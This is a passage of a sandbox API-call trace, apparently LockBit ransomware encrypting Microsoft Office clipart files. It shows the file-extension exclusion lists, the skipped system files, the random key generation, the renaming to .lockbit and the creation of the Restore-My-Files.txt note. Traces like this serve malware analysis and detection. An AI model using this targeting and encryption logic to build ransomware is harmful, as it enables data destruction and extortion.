lpString2="PE06049_.WMF") returned -1 [0167.954] lstrcmpiW (lpString1="..", lpString2="PE06049_.WMF") returned -1 [0167.954] PathFindExtensionW (pszPath="PE06049_.WMF") returned=".WMF" [0167.954] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.954] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.955] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.956] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.956] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE06049_.WMF") returned 1 [0167.956] lstrcmpiW (lpString1="ntldr", lpString2="PE06049_.WMF") returned -1 [0167.956] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE06049_.WMF") returned -1 [0167.956] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE06049_.WMF") returned -1 [0167.956] lstrcmpiW (lpString1="autorun.inf", lpString2="PE06049_.WMF") returned -1 [0167.957] lstrcmpiW (lpString1="thumbs.db", lpString2="PE06049_.WMF") returned 1 [0167.957] lstrcmpiW (lpString1="iconcache.db", lpString2="PE06049_.WMF") returned -1 [0167.957] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.957] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF") returned=".WMF" [0167.957] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.957] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.957] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.958] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.958] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF.lockbit") returned 72 [0167.958] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06049_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0167.959] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.959] malloc (_Size=0x40068) returned 0x3df0008 [0167.959] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4636) returned 1 [0167.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.959] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0167.959] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.960] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0167.960] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.963] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.963] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.964] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.965] free (_Block=0x1fa2ed8) [0167.965] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06049_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.965] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.965] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.965] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x59d01210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4048, dwReserved0=0x0, dwReserved1=0x0, cFileName="PE06450_.WMF", cAlternateFileName="")) returned 1 [0167.965] lstrcmpiW (lpString1=".", lpString2="PE06450_.WMF") returned -1 [0167.965] lstrcmpiW (lpString1="..", lpString2="PE06450_.WMF") returned -1 [0167.965] PathFindExtensionW (pszPath="PE06450_.WMF") returned=".WMF" [0167.965] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0167.965] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0167.966] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0167.966] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PE06450_.WMF") returned 1 [0167.967] lstrcmpiW (lpString1="ntldr", lpString2="PE06450_.WMF") returned -1 [0167.967] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PE06450_.WMF") returned -1 [0167.967] lstrcmpiW (lpString1="bootsect.bak", lpString2="PE06450_.WMF") returned -1 [0167.967] lstrcmpiW (lpString1="autorun.inf", lpString2="PE06450_.WMF") returned -1 [0167.967] lstrcmpiW (lpString1="thumbs.db", lpString2="PE06450_.WMF") returned 1 [0167.967] lstrcmpiW (lpString1="iconcache.db", lpString2="PE06450_.WMF") returned -1 [0167.967] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.967] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF") returned=".WMF" [0167.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0167.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0167.968] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0167.968] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0167.969] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF.lockbit") returned 72 [0167.969] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\pe06450_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0167.969] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0167.969] malloc (_Size=0x40068) returned 0x3f70048 [0167.969] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=16456) returned 1 [0167.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0167.970] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.970] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.970] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0167.970] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0167.975] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0167.975] malloc (_Size=0xa6) returned 0x1fa2ed8 [0167.975] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0167.976] free (_Block=0x1fa2ed8) [0167.976] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PE06450_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0167.976] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0167.976] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0167.976] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf15a1100, ftCreationTime.dwHighDateTime=0x1bd4e4a, ftLastAccessTime.dwLowDateTime=0x5a3d9150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf15a1100, ftLastWriteTime.dwHighDateTime=0x1bd4e4a, nFileSizeHigh=0x0, nFileSizeLow=0x629, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH00601G.GIF", cAlternateFileName="")) returned 1 [0167.976] lstrcmpiW (lpString1=".", lpString2="PH00601G.GIF") returned -1 [0167.976] lstrcmpiW (lpString1="..", lpString2="PH00601G.GIF") returned -1 [0167.976] PathFindExtensionW (pszPath="PH00601G.GIF") returned=".GIF" [0167.976] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0167.976] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0167.976] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0167.976] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0167.976] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0167.976] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0167.976] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0167.976] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0167.977] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0167.977] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0167.978] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH00601G.GIF") returned 1 [0167.978] lstrcmpiW (lpString1="ntldr", lpString2="PH00601G.GIF") returned -1 [0167.978] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH00601G.GIF") returned -1 [0167.978] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH00601G.GIF") returned -1 [0167.978] lstrcmpiW (lpString1="autorun.inf", lpString2="PH00601G.GIF") returned -1 [0167.978] lstrcmpiW (lpString1="thumbs.db", lpString2="PH00601G.GIF") returned 1 [0167.978] lstrcmpiW (lpString1="iconcache.db", lpString2="PH00601G.GIF") returned -1 [0167.978] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0167.978] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH00601G.GIF") returned=".GIF" [0167.978] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0167.978] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0167.979] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0167.979] lstrcmpiW 